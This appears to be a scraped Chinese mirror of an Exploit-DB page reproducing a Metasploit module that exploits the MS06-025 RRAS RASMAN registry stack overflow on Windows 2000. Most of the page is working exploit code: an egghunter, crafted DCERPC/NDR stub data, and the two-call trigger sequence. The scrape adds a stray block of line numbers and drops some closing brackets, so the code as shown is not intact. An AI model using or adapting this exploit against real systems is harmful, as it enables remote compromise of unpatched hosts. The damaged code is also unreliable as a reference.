Microsoft RRAS Service – RASMAN Registry Overflow (MS06-025) (Metasploit)

Exploit Database
120 阅读

作者： Metasploit

日期： 2010-08-25
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/16375/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

# $Id: ms06_025_rasmans_reg.rb 10150 2010-08-25 20:55:37Z jduck $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::Remote::Egghunter

include Msf::Exploit::Remote::DCERPC

include Msf::Exploit::Remote::SMB

def initialize(info = {})

super(update_info(info,

'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow',

'Description'=> %q{

This module exploits a registry-based stack buffer overflow in the Windows Routing

and Remote Access Service. Since the service is hosted inside svchost.exe,

a failed exploit attempt can cause other system services to fail as well.

A valid username and password is required to exploit this flaw on Windows 2000.

When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.

Exploiting this flaw involves two distinct steps - creating the registry key

and then triggering an overwrite based on a read of this key. Once the key is

created, it cannot be recreated. This means that for any given system, you

only get one chance to exploit this flaw. Picking the wrong target will require

a manual removal of the following registry key before you can try again:

HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook

'Author' => [ 'pusscat', 'hdm' ],

'License'=> BSD_LICENSE,

'Version'=> '$Revision: 10150 $',

'References' =>

[

[ 'CVE', '2006-2370' ],

[ 'OSVDB', '26437' ],

[ 'BID', '18325' ],

[ 'MSB', 'MS06-025' ]

'Privileged' => true,

'DefaultOptions' =>

{

'EXITFUNC' => 'thread'

'Payload'=>

{

'Space'=> 512,

'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

'StackAdjustment' => -3500,

'Platform' => 'win',

'Targets'=>

[

[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ],# call esi

'DefaultTarget'=> 0,

'DisclosureDate' => 'Jun 13 2006'))

register_options(

[

OptString.new('SMBPIPE', [ true,"Rawr.", 'router']),

], self.class)

end

# Post authentication bugs are rarely useful during automation

def autofilter

false

end

def exploit

connect()

smb_login()

print_status("Trying target #{target.name}...")

# Generate the egghunter payload

hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

egg= hunter[1]

# Pick a "filler" character that we know doesn't get mangled

# by the wide string conversion routines

filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"

fil= filset[ rand(filset.length) ].chr

# Bind to the actual DCERPC interface

handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

print_status("Binding to #{handle}")

dcerpc_bind(handle)

print_status("Bound to #{handle}")

# Add giant blocks of guard data before and after the egg

eggdata=

fil * 1024 +

egg +

fil * 1024

# Place the egghunter where ESI happens to point

bof = (fil * 178)

bof[84, hunter[0].length] = hunter[0]

# Overwrite the SEH ptr, even though ESP is smashed

# The handle after the ret must be an invalid address

pat =

(fil * 886) +

NDR.long(target.ret) +

(fil * 3) + "\xc0" +

bof

type2 =

NDR.string( (fil * 1024) + "\x00" ) +

NDR.string( pat + "\x00" ) +

NDR.string( (fil * 4096) + "\x00" ) +

NDR.long(rand(0xffffffff)) +

NDR.long(rand(0xffffffff))

type1 =

NDR.long(rand(0xffffffff)) + # OperatorDial

NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber

NDR.long(rand(0xffffffff)) + # UseLocation

NDR.long(rand(0xffffffff)) + # ShowLights

NDR.long(rand(0xffffffff)) + # ShowConnectStatus

NDR.long(rand(0xffffffff)) + # CloseOnDial

NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits

NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits

NDR.long(rand(0xffffffff)) + # SkipConnectComplete

NDR.long(rand(0xffffffff)) + # NewEntryWizard

NDR.long(rand(0xffffffff)) + # RedialAttempts

NDR.long(rand(0xffffffff)) + # RedialSeconds

NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds

NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure

NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing

NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery

NDR.long(rand(0xffffffff)) + # CallbackMode

NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc

NDR.wstring("\x00" * 129)+

NDR.long(rand(0xffffffff)) +

NDR.wstring("\x00" * 520)+

NDR.long(rand(0xffffffff)) +

NDR.string("\x00" * 514) +

NDR.long(rand(0xffffffff)) +

NDR.long(rand(0xffffffff))

stubdata =

type1 +

NDR.long(rand(0xffffffff)) +

eggdata

print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

begin

print_status('Creating the malicious registry key...')

response = dcerpc.call(0xA, stubdata)

print_status('Attempting to trigger the base pointer overwrite...')

response = dcerpc.call(0xA, stubdata)

rescue Rex::Proto::DCERPC::Exceptions::NoResponse

end

handler

disconnect

end